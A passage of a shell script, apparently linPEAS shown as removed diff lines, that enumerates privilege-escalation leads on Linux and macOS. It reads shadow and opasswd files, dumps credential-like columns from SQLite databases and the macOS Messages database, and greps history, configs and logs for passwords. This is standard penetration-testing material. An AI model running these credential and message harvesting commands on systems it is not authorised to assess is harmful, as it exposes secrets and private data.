[ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" -fi - -##-- IF) Users with capabilities -if [ -f "/etc/security/capability.conf" ] || [ "$DEBUG" ]; then - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" -fi - -##-- IF) AppArmor profiles to prevent suid/capabilities abuse -if ! [ "$SEARCH_IN_FOLDER" ]; then - if [ -d "/etc/apparmor.d/" ] && [ -r "/etc/apparmor.d/" ]; then - print_2title "AppArmor binary profiles" - ls -l /etc/apparmor.d/ 2>/dev/null | grep -E "^-" | grep "\." - echo "" - fi -fi - -##-- IF) Files with ACLs -print_2title "Files with ACLs (limited to 50)" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls" -if ! [ "$SEARCH_IN_FOLDER" ]; then - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," -else - ( (getfacl -t -s -R -p $SEARCH_IN_FOLDER 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," -fi - -if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! 
[ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," -fi -echo "" - -##-- IF) Files with ResourceFork -#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER -# print_2title "Files with ResourceFork" -# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" -# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" -#fi -#echo "" - -##-- IF) .sh files in PATH -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! 
[ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - broken_links=$(find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken) - if [ "$broken_links" ] || [ "$DEBUG" ]; then - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - fi -fi - -##-- IF) Date times inside firmware -if [ "$SEARCH_IN_FOLDER" ]; then - print_2title "FIles datetimes inside the firmware (limit 50)" - find "$SEARCH_IN_FOLDER" -type f -printf "%T+\n" 2>/dev/null | sort | uniq -c | sort | head -n 50 - echo "To find a file with an specific date execute: find \"$SEARCH_IN_FOLDER\" -type f -printf \"%T+ %p\n\" 2>/dev/null | grep \"\"" - echo "" -fi - -##-- IF) Executable files added by user -print_2title "Executable files potentially added by user (limit 70)" -if ! [ "$SEARCH_IN_FOLDER" ]; then - find / -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "000|/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 -else - find "$SEARCH_IN_FOLDER" -type f -executable -printf "%T+ %p\n" 2>/dev/null | grep -Ev "/site-packages|/python|/node_modules|\.sample|/gems" | sort -r | head -n 70 -fi -echo "" - - - -if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications -fi - -##-- IF) Unexpected in /opt -if ! [ "$SEARCH_IN_FOLDER" ]; then - if [ "$(ls /opt 2>/dev/null)" ]; then - print_2title "Unexpected in /opt (usually empty)" - ls -la /opt - echo "" - fi -fi - -##-- IF) Unexpected folders in / -if ! 
[ "$SEARCH_IN_FOLDER" ]; then - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find $ROOT_FOLDER -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" -fi - -##-- IF) Files (scripts) in /etc/profile.d/ -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - check_critial_root_path "/etc/profile" - check_critial_root_path "/etc/profile.d/" - fi - echo "" -fi - - ##-- IF) Files (scripts) in /etc/init.d/ - if ! [ "$SEARCH_IN_FOLDER" ]; then -print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ] && ! [ "$IAMROOT" ]; then #Those folders don´t exist on a MacOS - check_critial_root_path "/etc/init/" - check_critial_root_path "/etc/init.d/" - check_critial_root_path "/etc/rc.d/init.d" - check_critial_root_path "/usr/local/etc/rc.d" - check_critial_root_path "/etc/rc.d" - check_critial_root_path "/etc/systemd/" - check_critial_root_path "/lib/systemd/" - fi - - echo "" -fi - -##-- IF) Hashes in passwd file -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? 
................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! 
[ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" -fi - -##-- IF) Root files in home dirs -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" -fi - -##-- IF) Others files in my dirs -if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find $ROOT_FOLDER -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" -fi - -##-- IF) Readable files belonging to root and not world readable -if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find $ROOT_FOLDER -type f -user root ! -perm -o=r ! 
-path "/proc/*" 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" -fi - -##-- IF) Modified interesting files into specific folders in the last 5mins -print_2title "Modified interesting files in the last 5mins (limit 100)" -find $ROOT_FOLDER -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," -echo "" - -##-- IF) Writable log files -if command -v logrotate >/dev/null && logrotate --version | head -n 1 | grep -Eq "[012]\.[0-9]+\.|3\.[0-9]\.|3\.1[0-7]\.|3\.18\.0"; then #3.18.0 and below -print_2title "Writable log files (logrotten) (limit 50)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find $ROOT_FOLDER -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 50) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! 
[ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; - fi - fi - done -fi - -echo "" - -if ! [ "$SEARCH_IN_FOLDER" ]; then - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" | sort | uniq - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - if [ "$backup_folders" ] || [ "$DEBUG" ]; then - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - fi -fi - -##-- IF) Backup files -print_2title "Backup files (limited 100)" -backs=$(find $ROOT_FOLDER -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) -printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev 
"$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; -done -echo "" - -##-- IF) DB files -if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - -fi - - -if [ "$PSTORAGE_DATABASE" ] || [ "$DEBUG" ]; then - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found "$(file "$f") | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! 
"$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ] || [ "$DEBUG" ]; then - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - echo "" - fi - done - fi - fi - done -fi 
-echo "" - -if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" -fi - -##-- IF) Web files -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" -fi - -##-- IF) All hidden files -print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" -find $ROOT_FOLDER -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 -echo "" - -##-- IF) Readable files in /tmp, /var/tmp, bachups -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" -fi - -##-- IF) Interesting writable files by ownership or all -if ! 
[ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find $ROOT_FOLDER '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" -fi - -##-- IF) Interesting writable files by group -if ! [ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files" - for g in $(groups); do - iwfbg=$(find $ROOT_FOLDER '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! 
-path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - if [ "$iwfbg" ] || [ "$DEBUG" ]; then - printf " Group $GREEN$g:\n$NC"; - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - fi - done - echo "" -fi - -##-- IF) Passwords in history cmd -if [ "$(history 2>/dev/null)" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in history cmd" - history | grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED}," - echo "" -fi - -##-- IF) Passwords in history files -if [ "$PSTORAGE_HISTORY" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in history files" - printf "%s\n" "$PSTORAGE_HISTORY" | while read f; do grep -Ei "$pwd_inside_history" "$f" 2>/dev/null | sed -${E} "s,$pwd_inside_history,${SED_RED},"; done - echo "" -fi - -##-- IF) Passwords in config PHP files -if [ "$PSTORAGE_PHP_FILES" ] || [ "$DEBUG" ]; then - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done - echo "" -fi - -##-- IF) Passwords files in home -if [ "$PSTORAGE_PASSWORD_FILES" ] || [ "$DEBUG" ]; then - print_2title "Searching *password* or 
*credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found - echo "" -fi - -##-- IF) TTY passwords -if ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" -fi - -##-- IF) IPs inside logs -if [ "$DEBUG" ]; then - print_2title "Searching IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" -fi - -##-- IF) Passwords inside logs -if ! 
[ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" -fi - -if [ "$DEBUG" ]; then - ##-- IF) Emails inside logs - print_2title "Searching emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" -fi - - - - -if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then - ##-- IF) Find possible files with passwords - print_2title "Searching passwords inside key folders (limit 70) - only PHP files" - if ! [ "$SEARCH_IN_FOLDER" ]; then - intpwdfiles=$(timeout 150 find $HOMESEARCH /var/www/ /usr/local/www/ $backup_folders_row /tmp /etc /mnt /private -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) - else - intpwdfiles=$(timeout 150 find $SEARCH_IN_FOLDER -type f -exec grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null) - fi - printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - print_2title "Searching passwords inside key folders (limit 70) - no PHP files" - printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" - echo "" - - ##-- IF) 
Find possible files with passwords - print_2title "Searching possible password variables inside key folders (limit 140)" - if ! [ "$SEARCH_IN_FOLDER" ]; then - timeout 150 find $HOMESEARCH -exec grep -HnRiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g" & - timeout 150 find /var/www $backup_folders_row /tmp /etc /mnt /private grep -HnRiIE 